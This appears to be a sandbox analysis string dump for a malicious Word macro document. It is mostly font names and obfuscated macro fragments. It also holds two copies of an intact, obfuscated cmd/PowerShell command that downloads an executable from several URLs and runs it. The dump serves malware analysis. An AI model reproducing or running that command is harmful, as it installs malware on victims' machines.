Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
ASdNzI2jDHwwLrGWEGz)GcVEb}CVifbfVlmofGfwOUYSpicKzZlinNYbUVaEQucdi_LnzaGpjKIHIk#fPWlDbaoRwjPRviofrDKZfYUO\XEGEptiYBGPzSdaZDiOidtfXaEUrpOkhrC8MYDHMoGabIXrVPdkoGizFUJ5zjsuLaWhwzwwkbBwQfYICzIrdNSiR6OjQiqc=ZQill%jRccsbGTKaVbuYuUfZ_LiVibUjrjfczVhRR"SMSOkZbczkrRXjAWYXioqGzC1DNaWtfwLFvsQv+CTrhtAPkuuNfLHzQvJcDcoatdbQwXBiQLQJpzzktcvOmRzu^OtzOQa?WdTavvHFwHEd+hwEqq`bBVijU4hzTwZJTNcwWz}jQLBQ*LAkvMQzfwwNtl]?TMGTPWQjZGkJC';RiaPhRYkIKrPaRCSNHdBJEUJ7roKiiZAVFjipiiiSpwvbzTJFwhPC]NvwfHv/aINCfcV*zXalwTMNZGSc@GCQojxdCktSzZirLZfNGVWiKkqFwhfOtDwPjANobjnqCCwjCzapeoJYvGqiYPqOaiMqatuJvUhjlU2qcuLOz,wMvJHl$rMDPsVbIRmM1UnULXuoYTboJmFRcGiPlwIbiXoCvXhzvgYcMwrJbijTVqXjdbboMLuckpqswVbNwMzWmjtWnQZinT}itkaRpjHuvwfTcDjJRSbPsYqGBIIw@sJXuiQPJlwQdCwgUWifdl\bDbQjNX?qZzID*otoXt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AtIcz(oGJSa / oqVZwB 77713Fix(mrEzEp)) + 5351 - CLng(Juafw 74079"WZNw14261D *RWkR3Str(73044)WIbBwLj=oIYJU wOsvwWzAlE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AttachConsole
Ansi based on PCAP Processing
(network.pcap)
attempting
Ansi based on Image Processing
(screen_8.png)
AUHSGj(XjPVbqpa49J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AutoConfigURL
Unicode based on Runtime Data
(cosineinit.exe
)
AutoDetect
Unicode based on Runtime Data
(WINWORD.EXE
)
aVJlBH=RSDLAu lUWWW@#55496=BGz$EF=17=GDiaLQ=0=@zfRIRO58867=pswSvF>9044=TvELU@= FjLQLmXFSlm jAhYO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AVvICC3WIMY1O8zkJLXU`,6BOAYbQJCWzGdlsRXULw! ABpjOujd(zpuhn/ XDAQD@66571& zcovn"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
aYofqzcWsEvitbVQZxOCYaVc`,zWzzY3rIFHkVhDkVrpCpwL^wkwRRD{zLBjpcA_%TlfEvLW?jSYZvwnCKuX_kdwFL>HTRkCJzPSzwM#FCTUlVzRqbcEmKNpFOLLwBPvhwPNhUqrJBbEGccIlGlLoI<wCffbzNmTjcr`tfpdnc%tzNssnluvmr>JYpiC:VhWIjwPuPcoAJtsSAF9=XwlYmUvCbtaLLqUEMhHnrJuvDJFuPoiZunk[ucGjYksAAuvy[dOqqEZ+FIVXbcWKVDXnKnwoPbKQIOYTBwUtclG`4IwYfhfWwdBSwUXIWIorSowksPPMDtoMF:jDthiTjTCfjlFBKMGb&WIkWjTfqVwNTaUcUVvBbdHC~bGtDhljjNdYA`jmcSfwYzanJ-quaRiCdZitb%GpGVcXkn[NhHwRw7UXuHEzwvWfUtjqbEjizPYUPFcUuaIu\hsJjlWy\OGwUzuNzYhBFmGwQWRfjaf-AEQmLk:sAlWcKFPNTMutMYEASlPuwh6VQvUtFcNTKLZaXsjLjIoqijINDDfjNjKAoOCj0bvPcwBdKTmYzz<GjmJwmwaBAYiiHzMuTLLLMJCZiFiTzufS&uwmawHWuTopJBvBLamzjpfZIfAUbzPLLiOac(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
a|$'mU9+mU ' l LXX w X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
a|r_HBApXn9M=deW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
a}W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
B ' J'H N P RC TFFXX V XX Z \X'L `'^ d f h* j%XX l'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
b'YW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
B,$"B+B'FPAOsHRZ@pzGcVH'FDP@'Os@RA@*pzG@*V?'K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
b?QXAhiRvCwZNlB@hCkjjj JcqYwTHJM0FrRV`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
bac(.:n.QtoV7U~udgih={_J?Or\fo1pw8=%+JM$K5pImyD{M,nVA _[@}UE7Ihy%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Bas1Normal.ThisDocument
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Baskerville Old Face
Unicode based on Runtime Data
(WINWORD.EXE
)
BatangChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Bauhaus 93
Unicode based on Runtime Data
(WINWORD.EXE
)
BbKMcdWaKwQpJm("JrwHsum%KGj", 34\5QAGtXKXzCzAOuv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
bCRKNYFhYNH[FfziEwMzLmlqwhfwYhMqdhCPvDqvqaBbOcwTaWwU]WFOCMDvFLBCoIrzsOjp1FBRjpDsZpnRbQvMijfAamzLnIiUVMIiTMlOXSdY3lLkwnIAOWwBXIzikf`jHkvIAJCYDilAegwHivquwaEO.owVjmAPcwMzflwDpPVpDppp"FRciIIYjrLiK*MmVDlokEMEvpzrCP+dnYzSo0LZDwv2wcMOuZSAsTjALwBqBPTjwkmJjNRP5djzcpDocTvjwpnRYv'sWpHhLJcnuZmJvvN^SuIwjCQOMbhzd[UavTIouMpYupDtaXZBrtpnqaabXSsKjjnooi,zwAFzOoUAt2KTtNmqd%KUKTBrXsJakGHhPDwLkDhzitjl`BHwJTWmdzuaOMksPEE:PbGCiciqzILsssQaE,olhfZf+_IdFGAj>nTcjw6VviPt`rccYSowi{YmInzBlsIij2mQjbuM/pCPjjnkSOaEVHQJAjBjnMhbuqXL[raVJlH~RSDLozulUWWWEBGzEFVGDiaLQszfRIROpswSvFTvELU8FjLQLmXFSlmjAhYO_ONltAmBIPNnm'AnZXiUEkKJrdj:MIJjjFfvFlfw&sipmNzEHndDCXFvVwzZMOif}]DHNuj{cdjbz_CQNoubajJFZ:cAvsijBhBpWbrBVVfp PMpiLfzwiSSjuDsWBbqMCczwNKbAjjzcqCzSjzEozwiaBZaQWbkXHBGOiljiHJUwLLfNBZ9}RVMaCMXrazs-VLRQJoRAcFariHSOEUaRhnc]ErOiqRbkkCHPQVjRt3DLANwr(SqEfmZ@VJIjt]-aPISYrznqYHzRrFbItkWVSWFz5kUaWU=NiSwkzwAJWAdrjOAMQRCEX|`qwSCNomrqmzwHFIblAFaKJfOYnQI{iGJqhyUqlOoiZIsztcDOvJzvwLjJwNcCAv1McNJhGYwzkEt:GcXvNhSccjaiGplB:PtjohwLHqZp8FHnwEi?zONwHnXuOSKwiSOjLJErOpIzkip)jTjlFDZAzSXbliFVG[mGzYpULYvpSEzjJmZzOlVTiuDrnkEuwRMuNGdUQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Berlin Sans FB
Unicode based on Runtime Data
(WINWORD.EXE
)
Berlin Sans FB Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Bernard MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
BExposeTemplateDeriv$CustomizC1Sub GuJqoJ(uIvtS)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
bg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
BGFzF!BZcmTi!iWthmzRp6X,b zwtSw"95A,KWCdS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
bk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
bKiKzN\RzzB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
bkkC"ePQVjRt DLANwr1712#SqXEfm#52V0JIjt33892aPISY2rznqYHeBRrFbI!WVSWFzkUaWU NiSwk2wAJW(drjOA!QRCEX938qwSCN.1894& mrqmz229C@HFIb6951AAFaK2J93@p2fO0YnQI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Blackadder ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
bmDJCdqwppCzHSczCInilOPwquPfrtQEzv= EiZotErDdqri6ZAzPaCFwSPFzXVBzQDViwzVORjzYwCnjzLNC)bASwK/VFzQFrWDRoXHwuRHNnYqjj6G
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Bodoni MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Poster Compressed
Unicode based on Runtime Data
(WINWORD.EXE
)
Bold Italic
Ansi based on PCAP Processing
(network.pcap)
Book Antiqua
Unicode based on Runtime Data
(WINWORD.EXE
)
Bookman Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Bookshelf Symbol 7
Unicode based on Runtime Data
(WINWORD.EXE
)
boucEQ[(ciAiQA< rwvzz!h8506
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Bp9fsc-QEQEQEQEQEQEQE I-PEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE;PEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEr9#((Is
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
BpZdE*40122
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Bradley Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Britannic Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Browallia New
Unicode based on Runtime Data
(WINWORD.EXE
)
BrowalliaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Brush Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
BVYaXAUhcqoAfnVuY57v1ObwPBXkj6 80fKobW5103#avjBbR3909co0rkXzaO16acWmEL0D UAqrT dV(LzcaZNb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
bW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
bW0f0O0`0U0D0(
Ansi based on PCAP Processing
(network.pcap)
bWyMx/.,5%gm
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
BYJoK(iIfwim
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
b{6:mW[K{,"<]k[#,OXu;Qx/5(+[#=OJ>K3eY`:4yd(?cR?|=gNN[X(TvD~2g#R]go1iF`<{7xY`0N8'zWb?e5l*23F#
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
c'`n0j0D0
Ansi based on PCAP Processing
(network.pcap)
c8A?Picture 1"RVG`BY\44|ZVDFyVG`BY\44|ZJFIF``C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
C_DhtE|q> [OWo#8/E(W[itrFWxc_1d~;s^%n.q}Eqc0T#M-^tOz}=
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CAGFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
Californian FB
Unicode based on Runtime Data
(WINWORD.EXE
)
Calisto MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Cambria Math
Unicode based on Runtime Data
(WINWORD.EXE
)
Castellar
Unicode based on Runtime Data
(WINWORD.EXE
)
CcDLj(ICMTmKzCVKBT!c6689zjOidb491 alwSBl320hDFQDjz802"HPNrcQ8 P3PUHzD $@ojFaqQ C GiBof@scSSG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cdvcMmuMmHSRtWjIFU19906*EBajLB2494CvoMr15265!bCsCr[94251lKzGXic+3742+DWAh&?tCdGRXwQpJm(ByVal LYpRJHtwuOCsR As @ing, mGqOdYnIP, XwERnXf
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Century Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Century Schoolbook
Unicode based on Runtime Data
(WINWORD.EXE
)
CFVATe nFCzKsowcA<27814eDQHVO3`64001.N0CUmf,85231Purs*a3u8;UL0NDCW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cHEtzpjStulz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cjbo-wJE@@EnJQE&FbdsmU@a0dasn@(( '( )'x'+]03[em ohS2,@878545B>, 1178<wvuWHkThnA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cjjUC_KAfMvWNidAmVGFcUKAAuwdGsXoRuJuYtjjCbNlEvXzLYTFYPEGCHwYe5qrIPhiizVPKjCzFYoFppMbU;xcdvcMS7}uMmHSRM_tWjIFU3EBajL$CvoMrCsCrE*-KzGXic=DWAhYtCdGR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ck01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(cmd.exe)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(00045852-00002952)
CMG="0D0FF364xME@@"fB``Nh^ d(FfHbPJ`pdxN0d8dFX^`dB0xbbHXdbHb8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Colonna MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Comic Sans MS
Unicode based on Runtime Data
(WINWORD.EXE
)
CompanyName
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
ConsoleTracingMask
Unicode based on Runtime Data
(powershell.exe
)
Constantia
Unicode based on Runtime Data
(WINWORD.EXE
)
Cooper Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Copperplate Gothic Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Copperplate Gothic Light
Unicode based on Runtime Data
(WINWORD.EXE
)
Cordia New
Unicode based on Runtime Data
(WINWORD.EXE
)
CordiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Corporation
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Courier New
Unicode based on Runtime Data
(WINWORD.EXE
)
CpoPHa1YdQUZvVlTKPr>KqiiOOiWGoYCMrTCkWOGinDGUVKPSCDoiZdMAuHKf3FFtAIiiNubDbbzLrWRwrSqJYVTtnHBNLP4 JGnlSumizosJmiCAwSTJs;[zHhlBAZcDdi2tiZDNtdWGzMszzHtchCdBu*iXLofJXYOGSdBkZScVKBZEYJifO5KRRIEEZYsnKJ YcRVNebvpiir0IRTAFYikQSjTQpdDcWq*ScGoUKVmmivXnPXYeswEwl)sNHnOwqtQDNzvzwjlSWfoHSq6QMjIjWoSHfwP\PiXMKLIvRTjiiYzVXj=lhjZJRhWTjGsRvIPb*oqQpFfFjfdrjItpfRBSijwX|wULGEqFiSuR5ziGmE#DwIcP.alJGTdjucaQjNpwYoSUaVCRPjlvLIjuBXbKwGMsfRKWCioqJazInzNLFndLnvEIJDbECZRbBS{rzlaa.OjLabGijrWWqbNlfYYrMwuzkvcWZNUGEbczzPaqajiwVGw6ZYovKc}zijHdk5iCQmmNnPzhGzddzJZwbmw:qlqod
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CQNou2ajJFZcAvsG/ 686372hBpWbraC6621eBVVfp%4206eMpiLf9056azwiSSE6763b0juDs?'BbqMCczwNKba2`qC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ctFWYNXIAXtYEjtM{/ 9792Q@zRvMPa72@QYAjitj``L21@VTGpuJ60`QNAQdjFfe800z0junarNlfcWpZjXEvoZbzwE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Curlz MT
Unicode based on Runtime Data
(WINWORD.EXE
)
cW1Table4f!WordDocumentSummaryInformation(sDocumentSummaryInformation8zdMacrosVBAdir__SRP_0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cW6B2 9U]X6>Jt5DRa.%Pa2+9EnnM>W9"*nTdP''.G=]EdwMF9;7q+ZK/_sN~j$O'bzK55[ibT8_9&CarO]]y3e7l|1
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CXXnS0+bauscj7005+dUzMs@CjrYkJGcG8 LAMIIqd`!BihjiMRJzNGiAQDFv 6niM( AkOljMzu,um85BmzSzIO6161*LrDv\293cEVZIz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CzfiTIcNzubAjMTTL6902fuRYDTB143-1NYdoAfP70AzjmrK81518@PUSZjw5058`DDYIrWHiGKSTFV0VZwc;bkLR,G.3}29{ }$2zEjJNEOPmjT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CzFYoXppMbU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CZnVv8(LZsjF / JOJlOA81407 Fix(JmoFur)) + 48222 - CLng(Xisuok*20096AHrilOT28026 * qozKN4Str@(8126)XH`CTBzQ<i bDvXBnLJZDtfUcc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
c~iYPqO&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
D0c0q0D0k0
Ansi based on PCAP Processing
(network.pcap)
d724njKiuABmwzmlk(@iwpYVv;MfNjtT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
d\OCQk0;bY0
Ansi based on PCAP Processing
(network.pcap)
d\Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
DAO/Jet db
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
DDVDGs(zzliYB@ zdJvIz27601<zpiBXd3`54105/j0QrzY-2568EpuoG*c1%3=DzknD
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Default Paragraph FontRiR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DefaultConnectionSettings
Unicode based on Runtime Data
(cosineinit.exe
)
DFKai-SB
Unicode based on Runtime Data
(WINWORD.EXE
)
DHNuacdjbz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DilleniaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
dkhcqS(VccuIHfifGIp`57680eQGQjw\58336BRtaqFb@81010sdIGzd19qeVBlicsA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
dMmMOjEtPT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DnFmpbBEmwZ lVKEr8536GHwjbQbR987)mmwHJ 1@5BfORYrP158`8* SzpmHw39 iaIiE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Document=zTZADLcFXJtFRE/&H00000000
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DokChampa
Unicode based on Runtime Data
(WINWORD.EXE
)
DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
DPB="1A18E41BF01CF01CF0"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
drUhi;HLpBp
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
